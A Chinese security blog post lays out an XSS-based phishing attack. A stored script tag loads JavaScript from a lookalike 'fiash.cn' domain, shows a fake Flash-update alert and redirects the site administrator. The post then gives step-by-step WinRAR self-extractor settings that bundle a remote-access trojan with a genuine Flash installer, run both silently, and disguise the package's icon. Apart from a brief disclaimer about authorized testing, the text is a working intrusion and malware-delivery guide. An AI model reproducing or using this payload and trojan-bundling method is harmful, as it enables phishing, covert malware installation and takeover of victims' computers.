Xss之Flash钓鱼

2022-04-26 16:19:07 浏览数 (1)

相信很多朋友都看过Xss 弹出Flash更新进行钓鱼的文章

但大多文章都是一句话概括,故此写一篇关于这方面的文章

剧情:某日xxx黑客,发现某网站存在XSS漏洞,但是有httponly,xxx黑客就想利用Xss进行钓鱼,如果只是钓到账号密码,可以去伪造登录页面,提示登录超时,这里以拿到权限为主。

先说一下Flash源码(末尾有相关工具 源码下载地址)

我已经修改为和官方一模一样,包括英文界面(左边官方页面,右边伪造页面)

你只需要修改木马下载地址即可

这个时候xxx黑客已经伪造好了钓鱼页面,并且购买了个flash相似的域名 — fiash.cn

紧接着黑客xxx把下面代码,插入到留言框

代码语言:javascript复制
<script src="http://www.fiash.cn/version.js"></script>

vesrion.js:

代码语言:javascript复制
window.alert = function(name){
var iframe = document. createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
window. location.href="http://www.hackxc.cc";

管理员日常查看留言,提示Flash页面版本过低,会跳转倒

黑客xxx已经提前捆绑好木马,可正常安装Flash以及运行木马

下面解析木马绑定思路:

1.首选生成一个远控马,和正常的flash文件

2.接着利用WinRAR压缩文件添加压缩文件,后缀改为exe

3.高级——>自解压选项——>解压路径:C:windowstemp

4.高级——>自解压选项——>安装——>解压后运行

C:Windowstempqq.exe C:Windowstempflashplayer_install_cn.exe

5.高级——>自解压选项——>模式——>隐藏所有

6.高级——>自解压选项——>更新

                                    更新方式——>解压并更新文件                                     覆盖方式——>覆盖所有文件

7.保存后,生成exe,点击后会解压文件,然后执行

8.由于还不太像,我们需要修改文件的图标,属性等等,高仿flash 利用工具:ResourceHacker,在此就不介绍如何替换图标了

9.替换图标后运行文件,自动解压并且运行,

回到剧情,此时管理员已经上线,这个时候我们就可以把version.js改一个名称,这样网站就无法加载了。至此已经拿到管理员PC权限,此方法适用于已授权的渗透测试、红队评估、攻防演练,请勿用于其他非法途径。

最后为了确保上线几率,可以再写个txt放进去进行欺骗  哈哈

文由http://www.hackxc.cc

0 人点赞